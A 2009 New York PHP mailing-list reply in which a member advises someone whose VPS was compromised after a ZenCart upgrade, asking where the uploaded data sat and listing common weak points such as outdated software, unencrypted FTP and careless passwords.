On Fri, Sep 11, 2009 at 2:37 PM, Randal Rust <randalr...@gmail.com> wrote:
> > "Your VPS has been either hacked or an insecure script has been used > to upload stuff. We have tar'ed up the data was being used > (/tmp/b.tar.gz) You need to have your developer take a look at your > sites code to determine any vulnerabilities" > > To which I responded, "ok, assume that we believe all of our scripts > are secure. in looking at the logs, how do i pinpoint that someone > is/was trying to upload something?" > > Tech support was less than helpful after that. So I pose the question > to the list. How do I pinpoint the issue? There are about five domains > running on the site, and we did not have any issues until we upgraded > a ZenCart install for one of the sites. They tar'd up the data from where? It might help you to know what directory it was uploaded to. Although a clever rootkit would cover its tracks, a clever kit wouldn't take down your server. But really, the problem could be anywhere in the system. Was the OS up to date? Latest version of PHP? Anything hand-compiled that hadn't been updated in a long time? Are there FTP accounts (unencrypted)? Anyone lazy about their passwords? There are a lot of ways for a box to get hacked. But as Tim just pointed out, it's usually something simple and obvious, like connecting to FTP from Starbucks or emailing a password from an internet cafe while on vacation. _______________________________________________ New York PHP User Group Community Talk Mailing List http://lists.nyphp.org/mailman/listinfo/talk http://www.nyphp.org/show_participation.php
